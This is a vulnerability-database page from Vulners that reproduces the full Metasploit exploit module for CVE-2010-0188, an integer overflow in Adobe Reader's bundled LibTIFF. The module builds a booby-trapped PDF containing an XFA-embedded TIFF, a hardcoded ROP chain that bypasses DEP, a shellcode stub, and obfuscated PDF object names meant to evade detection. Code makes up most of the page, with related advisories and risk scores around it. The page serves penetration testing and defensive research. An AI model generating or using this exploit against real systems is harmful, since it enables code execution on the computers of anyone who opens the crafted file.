Vulners
Lucene search
Adobe Acrobat Bundled LibTIFF Integer Overflow
🗓️ 16 Mar 2010 18:06:50Reported by Microsoft, villy <[email protected]>, jduck <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 73 Views
| Reporter | Title | Published | Views | Family All 70 |
|---|---|---|---|---|
 | Adobe Acrobat libtiff Remote Code Execution Vulnerability | 13 Mar 201000:00 | – | zdt |
 | Immunity Canvas: ACROBAT_LIBTIFF | 22 Feb 201013:00 | – | canvas |
 | Adobe Acrobat < 9.3.1 / 8.2.1 Multiple Vulnerabilities (APSB10-07) | 17 Feb 201000:00 | – | nessus |
| Adobe Reader < 9.3.1 / 8.2.1 Multiple Vulnerabilities (APSB10-07) | 17 Feb 201000:00 | – | nessus |
| GLSA-201009-05 : Adobe Reader: Multiple vulnerabilities | 8 Sep 201000:00 | – | nessus |
| RHEL 4 / 5 : acroread (RHSA-2010:0114) | 19 Feb 201000:00 | – | nessus |
| openSUSE Security Update : acroread (acroread-2068) | 4 Mar 201000:00 | – | nessus |
| openSUSE Security Update : acroread (acroread-2068) | 4 Mar 201000:00 | – | nessus |
| openSUSE Security Update : acroread (acroread-2068) | 4 Mar 201000:00 | – | nessus |
| SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 2065) | 4 Mar 201000:00 | – | nessus |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Acrobat Bundled LibTIFF Integer Overflow',
'Description' => %q{
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat
Professional versions 8.0 through 8.2 and 9.0 through 9.3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Microsoft', # reported to Adobe
'villy <villys777[at]gmail.com>', # public exploit
# Metasploit version by:
'jduck'
],
'References' =>
[
[ 'CVE', '2010-0188' ],
[ 'BID', '38195' ],
[ 'OSVDB', '62526' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-07.html' ],
[ 'URL', 'http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76' ],
[ 'URL', 'http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'DisablePayloadHandler' => true
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 6.0.1 - untested
# reader 7.0.5 - untested
# reader 7.0.8 - untested
# reader 7.0.9 - untested
# reader 7.1.0 - untested
# reader 7.1.1 - untested
# reader 8.0.0 - untested
# reader 8.1.1 - untested
# reader 8.1.2 - untested
# reader 8.1.3 - untested
# reader 8.1.4 - untested
# reader 8.1.5 - untested
# reader 8.1.6 - untested
# reader 8.2.0 - untested
# reader 9.0.0 - untested
# reader 9.1.0 - untested
# reader 9.2.0 - untested
# reader 9.3.0 - works
[ 'Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)',
{
# ew, hardcoded offsets - see make_tiff()
}
],
],
'DisclosureDate' => '2010-02-16',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
tiff_data = make_tiff(payload.encoded)
xml_data = make_xml(tiff_data)
compressed = Zlib::Deflate.deflate(xml_data)
# Create the pdf
pdf = make_pdf(compressed)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj\r\n" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(xml_data)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Filter/FlateDecode/Length ") << xml_data.length.to_s << n_obfu("/Type /EmbeddedFile>>") << eol
pdf << "stream" << eol
pdf << xml_data << eol
pdf << eol << "endstream" << eol
pdf << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</V () /Kids [") << io_ref(3) << n_obfu("] /T (") << "topmostSubform[0]" << n_obfu(") >>") << eol << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Parent ") << io_ref(2) << n_obfu(" /Kids [") << io_ref(4) << n_obfu("] /T (") << "Page1[0]" << n_obfu(")>>")
pdf << eol << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P ") << io_ref(5)
pdf << n_obfu("/FT /Btn/TU (") << "ImageField1" << n_obfu(")/Ff 65536/Parent ") << io_ref(3)
pdf << n_obfu("/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (") << "ImageField1[0]" << n_obfu(")/Rect [107.385 705.147 188.385 709.087]>>")
pdf << eol << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent ")
pdf << io_ref(6) << n_obfu("/Type /Page/PieceInfo null>>")
pdf << eol << endobj
xref << pdf.length
pdf << io_def(6) << n_obfu("<</Kids [") << io_ref(5) << n_obfu("]/Type /Pages/Count 1>>")
pdf << eol << endobj
xref << pdf.length
pdf << io_def(7) << ("<</PageMode /UseAttachments/Pages ") << io_ref(6)
pdf << ("/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm ") << io_ref(8)
pdf << ("/Type /Catalog>>")
pdf << eol << endobj
xref << pdf.length
pdf << io_def(8) << n_obfu("<</DA (/Helv 0 Tf 0 g )/XFA [(template) ") << io_ref(1) << n_obfu("]/Fields [")
pdf << io_ref(2) << n_obfu("]>>")
pdf << endobj << eol
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(7) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF"
end
def make_tiff(code)
tiff_offset = 0x2038
shellcode_offset = 1500
tiff = "II*\x00"
tiff << [tiff_offset].pack('V')
tiff << make_nops(shellcode_offset)
tiff << code
# Padding
tiff << rand_text_alphanumeric(tiff_offset - 8 - code.length - shellcode_offset)
tiff << "\x07\x00\x00\x01\x03\x00\x01\x00"
tiff << "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
tiff << "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
tiff << "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
tiff << "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
tiff << "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
tiff << "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00"
# The following executes a ret2lib using BIB.dll
# The effect is to bypass DEP and execute the shellcode in an indirect way
stack_data = [
0x70072f7, # pop eax / ret
0x10104,
0x70015bb, # pop ecx / ret
0x1000,
0x700154d, # mov [eax], ecx / ret
0x70015bb, # pop ecx / ret
0x7ffe0300, # -- location of KiFastSystemCall
0x7007fb2, # mov eax, [ecx] / ret
0x70015bb, # pop ecx / ret
0x10011,
0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
0x70015bb, # pop ecx / ret
0x10100,
0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
0x70072f7, # pop eax / ret
0x10011,
0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
0x7005c54, # pop esi / add esp,0x14 / ret
0xffffffff,
0x10100,
0x0,
0x10104,
0x1000,
0x40,
# The next bit effectively copies data from the interleaved stack to the memory
# pointed to by eax
# The data copied is:
# \x5a\x52\x6a\x02\x58\xcd\x2e\x3c\xf4\x74\x5a\x05\xb8\x49\x49\x2a
# \x00\x8b\xfa\xaf\x75\xea\x87\xfe\xeb\x0a\x5f\xb9\xe0\x03\x00\x00
# \xf3\xa5\xeb\x09\xe8\xf1\xff\xff\xff\x90\x90\x90\xff\xff\xff\x90
0x700d731, # mov eax, [ebp-0x24] / ret
0x70015bb, # pop ecx / ret
0x26a525a,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x3c2ecd58,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0xf4745a05,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x2a4949b8,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0xaffa8b00,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0xfe87ea75,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0xb95f0aeb,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x3e0,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x9eba5f3,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0xfffff1e8,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x909090ff,
0x700154d, # mov [eax], ecx / ret
0x700a722, # add eax, 4 / ret
0x70015bb, # pop ecx / ret
0x90ffffff,
0x700154d, # mov [eax], ecx / ret
0x700d731, # mov eax, [ebp-0x24] / ret
0x700112f # call eax -- (execute stub to transition to full shellcode)
].pack('V*')
tiff << stack_data
Rex::Text.encode_base64(tiff)
end
def make_xml(tiff_data)
xml_data = <<-EOS
<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">REPLACE_TIFF</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>
EOS
xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
xml_data
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2023 10:43Current
7.1High risk
Vulners AI Score7.1
CVSS 29.3
CVSS 3.17.8
EPSS0.88246